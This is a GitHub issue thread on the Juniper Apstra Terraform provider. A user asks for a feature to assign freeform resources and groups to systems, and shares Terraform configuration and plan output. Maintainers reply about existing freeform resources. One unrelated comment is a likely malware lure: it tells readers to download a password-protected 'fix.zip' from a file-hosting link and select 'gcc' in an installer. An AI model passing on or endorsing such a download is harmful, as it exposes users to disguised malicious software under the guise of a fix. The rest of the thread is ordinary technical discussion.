### ISSUE TITLE
Add new Feature assignment Resource and Group to system

### ISSUE THREAD

**Issue by ihadi581** [Juniper/terraform-provider-apstra#818]
I would like to suggest adding a resource assignment feature so that it can be created by terafrom.

this sample from Apstra UI:
<img width="1204" alt="image" src="https://github.com/user-attachments/assets/e7b35701-12b8-4491-8ab2-61a460730689">

Currently I apply it manually to the system. not only the system, later it can also be applied to interfaces to assign, for example, vlan and lacp-id etc.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bwJuniper** [comment]
Hi there, is this for Freeform or for DC Ref Design?

**Comment by ihadi581** [comment]
This for freeform part of resource management

**Comment by bwJuniper** [comment]
OK, just making sure you have seen: https://registry.terraform.io/providers/Juniper/apstra/latest/docs/resources/freeform_resource and https://registry.terraform.io/providers/Juniper/apstra/latest/docs/resources/freeform_resource_generator im guessing you want to manually assign these resources to a system? if that is the case please let me know and I'll think about how this is accomplished and implement/modify the correct resource.

**Comment by ihadi581** [comment]
for example i use : https://registry.terraform.io/providers/Juniper/apstra/latest/docs/resources/freeform_resource

this example test output:
```
data "apstra_freeform_resource" "overlay-asn" {
  blueprint_id = apstra_freeform_blueprint.dc1.id
  id           = apstra_freeform_resource.overlay-asn.id
}

output "overlay_asn_resource_generator_out" {
  value = data.apstra_freeform_resource.overlay-asn
}
```

after terraform plan output not already key for assignment
```
Changes to Outputs:
  + overlay_asn_resource_generator_out = {
      + allocated_from = null
      + blueprint_id   = "2965ddf3-7ad7-474c-a07c-f90b202d1671"
      + generator_id   = null
      + group_id       = "EHoAG5RfAu65yyFzOXk"
      + id             = "UN8r61DJQjY1HwAg6oE"
      + integer_value  = 64512
      + ipv4_value     = null
      + ipv6_value     = null
      + name           = "overlay_asn"
      + type           = "asn"
    }
```
